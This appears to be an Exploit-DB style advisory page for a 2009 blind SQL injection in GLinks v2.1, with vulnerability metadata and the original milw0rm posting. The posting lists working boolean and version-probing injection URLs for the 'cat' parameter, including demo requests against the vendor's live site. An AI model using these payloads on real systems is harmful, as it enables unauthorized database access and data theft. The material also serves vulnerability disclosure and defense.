GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability

vendor:

GLinks

by:

599eme Man

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: GLinks

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:groonesworld:glinks:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability

GLinks v2.1 is vulnerable to a blind SQL injection vulnerability. This vulnerability allows an attacker to execute arbitrary SQL queries on the vulnerable system. The vulnerability is located in the 'cat' parameter of the 'index.php' script. An attacker can inject malicious SQL queries to the vulnerable parameter and execute them on the vulnerable system. This can be exploited to gain access to the vulnerable system and to gain access to sensitive data stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of GLinks v2.1.

Source

Exploit-DB raw data:

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________



# [+] GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability
# [+] Software : President Bios
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special Thanks : Moudi Aka SixSo  brozazaaaaaaaaa
# [+] Dowload : http://www.groonesworld.com/programs/glinks/glinks.zip
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#	[+] Blind SQL
#
#		- http://www.site.com/index.php?cat=[nr] and 1=1 <= true
#		- http://www.site.com/index.php?cat=[nr] and 1=2 <= False
#
#		- http://www.site.com/index.php?cat=[nr] and substring(@@version,1,1)=4 <= false
#		- http://www.site.com/index.php?cat=[nr] and substring(@@version,1,1)=5 <= true
#
#			[+] Demo
#
#				- http://www.groonesworld.com/demos/glinks/index.php?cat=82%20and%20substring(@@version,1,1)=5 <= True
#				- http://www.groonesworld.com/demos/glinks/index.php?cat=82%20and%20substring(@@version,1,1)=4 <= False
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

# milw0rm.com [2009-07-23]